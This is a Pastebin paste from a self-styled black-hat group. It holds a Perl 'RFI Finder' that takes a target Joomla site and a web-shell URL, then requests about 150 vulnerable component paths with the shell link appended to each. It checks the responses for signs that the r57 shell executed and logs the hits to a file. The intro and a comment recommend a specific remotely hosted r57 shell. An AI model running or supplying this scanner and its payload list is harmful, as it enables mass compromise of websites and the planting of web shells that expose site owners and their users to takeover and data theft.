API tools faq
paste
Advertisement
G3n3Rall

BHG Joomla RFI Finder

G3n3Rall
May 19th, 2012
207
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 13.72 KB | None | 0 0
raw download clone embed print report
  1. Hi Guys
  2.  
  3. Here is joomla RFI Finder :D
  4. it work better with this shell script : http://www.mcrracecars.co.uk/images/r57.txt
  5. and Have 150 RFI directory  :D
  6. and it have txt output too
  7.  
  8.  
  9.  
  10. #!/usr/bin/perl
  11. # RFI = Remote File Inclusion
  12. #BHG Joomla RFI Scanner Version Beta
  13. #Black HaT Group Security Center
  14. #visit us => Black-hg.org  
  15. #our forum => Black-hg.org/cc
  16. #AnTi.SecurityBoy@Gmail.com
  17. #We Are : Net.Edit0r , A.Crox , 3H34N , Am!n , tHe.K!ll3r , ArYaIeIrAn , G3n3Rall , Mr.XHat , NoL1m1t , Black Viper ,Nitrojen90 .....
  18. #IRANIAN HACKERS
  19. use LWP::Simple;
  20. system(($^O eq 'MSWin32') ? 'cls' : 'clear');
  21. print "##############################################################################";
  22. print "\n";
  23. print "\t\t BLACK HAT GROUP LFI SCANNER [#BHG RFI SCANNER VERSION BETA]\n";
  24. print "\t\t WWW.BLACK-HG.ORG   <<<>>> WWW.BLACK-HG.ORG/CC/";
  25. print "\n\n\t\t Code By G3n3Rall \n";
  26. print " \n";
  27. print " \n";
  28. sleep (1);
  29. print "\n";
  30. print "\t\tPlease Enter Target [http://www.site.com]";
  31. print "\n\n \t Target:";
  32. $Target=<STDIN>;
  33. chomp ($Target);
  34. print "\n\t\t  please Enter Shell Link:";  #May Can help you : http://www.mcrracecars.co.uk/images/r57.txt
  35. $Shell =<STDIN>;
  36. chomp ($Shell);
  37. print"\n\n \t\t Please wait";
  38. sleep(2);
  39. print"\n";
  40. ################
  41. #150 Directories
  42. @Path = ("/components/com_flyspray/startdown.php?file=",
  43. "/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=",
  44. "/components/com_simpleboard/file_upload.php?sbp=",
  45. "/components/com_hashcash/server.php?mosConfig_absolute_path=",
  46. "/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=",
  47. "/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=",
  48. "/components/com_performs/performs.php?mosConfig_absolute_path=",
  49. "/components/com_forum/download.php?phpbb_root_path=",
  50. "/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=",
  51. "/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=",
  52. "/components/minibb/index.php?absolute_path=",
  53. "/components/com_smf/smf.php?mosConfig_absolute_path=",
  54. "/modules/mod_calendar.php?absolute_path=",
  55. "/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=",
  56. "/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=",
  57. "/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=",
  58. "/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=",
  59. "/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=",
  60. "/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=",
  61. "/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=",
  62. "/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=",
  63. "/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=",
  64. "/components/com_securityimages/configinsert.php?mosConfig_absolute_path=",
  65. "/components/com_securityimages/lang.php?mosConfig_absolute_path=",
  66. "/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=",
  67. "/components/com_galleria/galleria.html.php?mosConfig_absolute_path=",
  68. "/akocomments.php?mosConfig_absolute_path=",
  69. "/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=",
  70. "/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=",
  71. "/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=",
  72. "/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=",
  73. "/components/com_zoom/includes/database.php?mosConfig_absolute_path=",
  74. "/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=",
  75. "/components/com_fm/fm.install.php?lm_absolute_path=",
  76. "/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=",
  77. "/components/com_lmo/lmo.php?mosConfig_absolute_path=",
  78. "/administrator/components/com_webring/admin.webring.docs.php?component_dir=",
  79. "/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=",
  80. "/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=",
  81. "/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=",
  82. "/components/com_mambowiki/MamboLogin.php?IP=",
  83. "/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=",
  84. "/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=",
  85. "/components/com_cpg/cpg.php?mosConfig_absolute_path=",
  86. "/components/com_moodle/moodle.php?mosConfig_absolute_path=",
  87. "/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=",
  88. "/components/com_mospray/scripts/admin.php?basedir=",
  89. "/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=",
  90. "/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=",
  91. "/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=",
  92. "/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=",
  93. "/components/com_madeira/img.php?url=",
  94. "/components/com_bsq_sitestats/external/rssfeed.php?baseDir=",
  95. "/com_bsq_sitestats/external/rssfeed.php?baseDir=",
  96. "/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=",
  97. "/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=",
  98. "/administrator/components/admin.jjgallery.php?mosConfig_absolute_path=",
  99. "/components/com_jreviews/scripts/xajax.inc.php?mosConfig_absolute_path=",
  100. "/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=",
  101. "/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=",
  102. "/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=",
  103. "/administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=",
  104. "/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=",
  105. "/administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=",
  106. "/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=",
  107. "/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=",
  108. "/index.php?option=com_custompages&cpage=",
  109. "/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=",
  110. "/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=",
  111. "/components/com_facileforms/facileforms.frame.php?ff_compath=",
  112. "/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=",
  113. "/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=",
  114. "/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=",
  115. "/administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=",
  116. "/administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=",
  117. "/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=",
  118. "/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=",
  119. "/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=",
  120. "/administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=",
  121. "/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=",
  122. "/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=",
  123. "/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=",
  124. "/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=",
  125. "/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=",
  126. "/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=",
  127. "/administrator/components/com_dadamail/config.dadamail.php?GLOBALS['mosConfig_absolute_path']=",
  128. "/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=",
  129. "/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=",
  130. "/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=",
  131. "/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=",
  132. "/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=",
  133. "/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=",
  134. "/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=",
  135. "/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=",
  136. "/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=",
  137. "/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=",
  138. "/components/com_reporter/reporter.logic.php?mosConfig_absolute_path=",
  139. "/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=",
  140. "/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=",
  141. "/components/com_joomlaboard/file_upload.php?sbp=",
  142. "/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=",
  143. "/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=",
  144. "/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=",
  145. "/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=",
  146. "/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=",
  147. "/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=",
  148. "/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=",
  149. "/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=",
  150. "/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=",
  151. "/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=",
  152. "/modules/mod_as_category.php?mosConfig_absolute_path=",
  153. "/components/com_articles.php?absolute_path=",
  154. "/classes/html/com_articles.php?absolute_path=",
  155. "/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=",
  156. "/templates/be2004-2/index.php?mosConfig_absolute_path=",
  157. "/libraries/pcl/pcltar.php?g_pcltar_lib_dir=",
  158. "/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=",
  159. "/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=",
  160. "/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=",
  161. "/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=",
  162. "/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=",
  163. "/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=",
  164. "/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=",
  165. "/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=",
  166. "/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=",
  167. "/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=",
  168. "/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=",
  169. "/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=",
  170. "/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=",
  171. "/components/com_mp3_allopass/allopass.php?mosConfig_live_site=",
  172. "/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=",
  173. "/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=",
  174. "/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=",
  175. "/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=",
  176. "/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=",
  177. "/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=",
  178. "/administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=",
  179. "/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=",
  180. "/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=",
  181. "/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=",
  182. "/administrator/components/com_color/admin.color.php?mosConfig_live_site=",
  183. "/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=",
  184. "/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=",
  185. "/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=",
  186. "/index.php?option=com_adsmanager&mosConfig_absolute_path=",
  187. "/com_ponygallery/admin.ponygallery.html.php?mosConfig_absolute_path=",
  188. "/com_magazine_3_0_1/magazine.functions.php?config=",
  189. "/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=",
  190. "/administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path=",
  191. "/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=");
  192. ##############
  193. foreach $PathLinks(@Path){
  194. my $URL =$Target.$PathLinks.$Shell;
  195. my $Source = get $URL;
  196.  
  197. if ($Source =~ /r57shell/ || /safe_mode/ || /Executed / || /Shell/){ $Message ="RFI Vulnerability FOUND";}
  198. else { $Message = "NOT FOUND RFI Vulnerability";}
  199. print "\n $URL  =>   $Message \n";
  200. open (TEXT, '>>RFI.txt');
  201. print TEXT "\n $URL   =>   $Message \n\n";
  202. close (TEXT);
  203.  
  204. }
  205.  
  206. system("pause");
  207.  
  208.  
  209.  
  210. Black Hat group Security Center
  211. Site: www.Black-hg.org
  212. Forum: www.Black-hg.org/cc/
  213. By G3n3Rall
  214. AnTi.SecurityBoy@Gmail.com
  215.  
  216. Bye.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!